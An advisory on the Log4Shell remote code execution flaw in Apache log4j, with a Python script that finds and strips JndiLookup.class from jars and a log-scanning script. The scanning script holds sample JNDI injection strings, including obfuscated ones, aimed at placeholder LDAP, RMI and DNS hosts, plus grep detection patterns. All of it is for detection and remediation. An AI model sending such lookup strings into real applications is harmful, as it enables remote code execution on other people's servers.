0-day exploit found in log4j (Log4Shell)
Overview
A remote code execution (RCE) vulnerability, CVE-2021-44228, has been found in the popular Java logging library Apache log4j (the 2.x branch, Log4j 2).
The vulnerability is an injection attack, comparable in shape to SQL injection: log4j's message lookup feature evaluates strings of the form ${jndi:...} that appear in logged data, and a JNDI lookup pointing at an attacker-controlled LDAP or RMI server can result in remote code being loaded and executed. This means any source of attacker-controlled data that an application using log4j writes to its logs (HTTP headers such as User-Agent, form fields, usernames, and so on) is a potential RCE vector. Internet-facing web applications are of particular concern because they log attacker-supplied input by design.
Impact
An unauthenticated remote attacker who can get a crafted string into a log message can execute arbitrary code with the privileges of the vulnerable application's process.
Affected Products
The affected versions of log4j are:
Apache log4j 2.0-beta9 through 2.14.1 (commonly written as 2.0 <= Apache log4j <= 2.14.1)
This is a popular package used by many other projects, including Apache Struts 2 and Minecraft servers, so it will often be present as a transitive dependency of a product rather than something an organisation chose to install directly.
Containment, Mitigations & Remediations
The primary remediation is to update log4j to a fixed release (2.15.0 or later at the time of writing). If updating is impractical, one mitigation discussed on the project's GitHub issue is to remove the vulnerable class, org/apache/logging/log4j/core/lookup/JndiLookup.class, from the log4j-core jar. The application (or JVM) must be restarted for the change to take effect, and the jar may be nested inside a WAR or EAR or bundled into a fat jar, so every copy has to be located and treated.
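As an added example (not code from the original advisory or from the Log4j project), the Python below walks a directory tree, reports every archive that carries JndiLookup.class, recursing into jars nested inside WAR/EAR files, and rewrites a plain jar without that class. It performs the same operation as the commonly used one-liner `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. The "log4j-core-2.14.1.jar" and "app.war" it builds are constructed stand-ins containing placeholder bytes, not real log4j artifacts; function names are the author's own.

```python
import io
import os
import tempfile
import zipfile

# Class that the documented mitigation removes from log4j-core.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
FAKE_CLASS = b"\xca\xfe\xba\xbe demo"  # constructed placeholder, not real bytecode


def _locate_jndilookup(zf, prefix=""):
    """Return paths of JndiLookup.class inside zf, recursing into nested archives
    (a WAR normally carries log4j-core under WEB-INF/lib/)."""
    found = []
    for name in zf.namelist():
        if name == JNDI_LOOKUP:
            found.append(prefix + name)
        elif name.endswith(ARCHIVE_SUFFIXES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    found.extend(_locate_jndilookup(inner, prefix + name + "!"))
            except zipfile.BadZipFile:
                pass
    return found


def find_vulnerable_archives(root):
    """Walk root; return {archive_path: [entry, ...]} for archives that carry JndiLookup."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fname in sorted(files):
            if not fname.endswith(ARCHIVE_SUFFIXES):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with zipfile.ZipFile(path) as zf:
                    entries = _locate_jndilookup(zf)
            except zipfile.BadZipFile:
                continue
            if entries:
                hits[path] = entries
    return hits


def remove_jndilookup(jar_path):
    """Rewrite jar_path without its top-level JndiLookup.class; return True if it was present.
    Nested archives are left alone on purpose: extract the inner jar and treat it separately."""
    tmp_path = jar_path + ".tmp"
    removed = False
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp_path, "w") as dst:
        for item in src.infolist():
            if item.filename == JNDI_LOOKUP:
                removed = True
                continue
            dst.writestr(item, src.read(item.filename))
    if removed:
        os.replace(tmp_path, jar_path)  # atomic swap; the JVM still needs a restart
    else:
        os.remove(tmp_path)
    return removed


def make_demo_jar_bytes():
    """Constructed stand-in for log4j-core-2.14.1.jar (two fake entries, not real log4j)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("org/apache/logging/log4j/core/Logger.class", FAKE_CLASS)
        zf.writestr(JNDI_LOOKUP, FAKE_CLASS)
    return buf.getvalue()


def demo_roundtrip():
    """Lay out a fake deployment, scan it, patch the plain jar, scan again."""
    with tempfile.TemporaryDirectory() as root:
        jar = os.path.join(root, "lib", "log4j-core-2.14.1.jar")
        war = os.path.join(root, "webapps", "app.war")
        os.makedirs(os.path.dirname(jar))
        os.makedirs(os.path.dirname(war))
        with open(jar, "wb") as fh:
            fh.write(make_demo_jar_bytes())
        with zipfile.ZipFile(war, "w") as zf:  # WAR with the jar nested inside
            zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", make_demo_jar_bytes())

        def rel(hits):
            return {os.path.relpath(p, root).replace(os.sep, "/"): e for p, e in hits.items()}

        before = rel(find_vulnerable_archives(root))
        removed = remove_jndilookup(jar)
        removed_again = remove_jndilookup(jar)
        after = rel(find_vulnerable_archives(root))
        with zipfile.ZipFile(jar) as zf:
            remaining = zf.namelist()
    return {"before": before, "removed": removed, "removed_again": removed_again,
            "after": after, "remaining": remaining}


if __name__ == "__main__":
    for key, value in demo_roundtrip().items():
        print(f"{key}: {value}")
```

The second scan still flags app.war: the class was only removed from the stand-alone jar, which is the point of the nested-archive check. In a real deployment, run the scan first, record every hit, and only then patch, so nothing under WEB-INF/lib or inside an uber-jar is missed.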
Indicators of Compromise
Security researcher Florian Roth has published notes on detecting exploitation attempts, including a regular expression to search log sources:
`sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://[^\n]+' /var/log`
This matches only the plain form of the lookup string. Attackers quickly moved to obfuscated variants (nested lookups such as ${${lower:j}ndi:...} that hide the literal word "jndi", and other URI schemes such as dns), which this pattern will miss, so treat it as a first pass rather than a complete detection. A hit indicates an attempt, not necessarily a successful exploitation; confirming the latter means looking for the follow-on outbound LDAP/RMI connection or unexpected class load from the application host.
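As an added example (not from Florian Roth's notes or the original page), the Python below runs a direct translation of the published pattern over a handful of constructed web-server log lines, then runs a second pass that first undoes the common Log4j lookup obfuscations (${lower:x} / ${upper:x} case-conversion lookups and ${::-x} default-value lookups) and matches any JNDI scheme. The log lines and addresses (documentation ranges) are constructed for the example; the function names are the author's own.

```python
import re

# Constructed sample log lines (documentation IP ranges, not captured traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7/x}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:rmi://198.51.100.9:1099/obj}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "-" "${j${::-n}di:dns://198.51.100.7/z}"',
]

# Python equivalent of the published egrep pattern (plain ldap/ldaps/rmi form only).
PUBLISHED_PATTERN = re.compile(r"\$\{jndi:(ldaps?|rmi)://[^\n]+", re.IGNORECASE)

# Broader pattern applied after de-obfuscation: any JNDI lookup, any scheme.
BROAD_PATTERN = re.compile(r"\$\{jndi:[a-z]+:", re.IGNORECASE)

# Log4j lookup tricks used to hide the literal string "jndi" from naive matching:
#   ${lower:j} / ${upper:J}  -> j   (case-conversion lookups)
#   ${::-j} / ${env:NOPE:-j} -> j   (default value of an unresolvable lookup)
_OBFUSCATIONS = [
    re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE),
    re.compile(r"\$\{[^{}]*:-([^{}]*)\}"),
]


def normalize(text):
    """Collapse nested obfuscation lookups until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        for pattern in _OBFUSCATIONS:
            text = pattern.sub(r"\1", text)
    return text


def scan(lines, pattern, deobfuscate):
    """Return indices of lines matching pattern, optionally normalising them first."""
    hits = []
    for index, line in enumerate(lines):
        candidate = normalize(line) if deobfuscate else line
        if pattern.search(candidate):
            hits.append(index)
    return hits


if __name__ == "__main__":
    print("published pattern:", scan(SAMPLE_LOGS, PUBLISHED_PATTERN, deobfuscate=False))
    print("broad + normalize:", scan(SAMPLE_LOGS, BROAD_PATTERN, deobfuscate=True))
```

The published pattern catches the two plain ldap/rmi lines and misses the nested-lookup and dns lines; the normalising pass catches all four. The normaliser is deliberately simple (it only handles the two most common tricks) and should be extended as new variants appear rather than relied on as a complete decoder.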
Threat Landscape
log4j is a common library used in many enterprise Java applications. As such, it is hard to predict which other applications will turn out to contain a vulnerable copy of the library; an inventory of Java applications and their dependencies, direct and transitive, is the starting point for finding them.
This is an easily exploited RCE with a wide range of applicability, which is likely to appeal to ransomware groups as well as to opportunistic mass scanning.
Mitre Methodologies
T1190 – Exploit Public-Facing Application
Further Information
Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package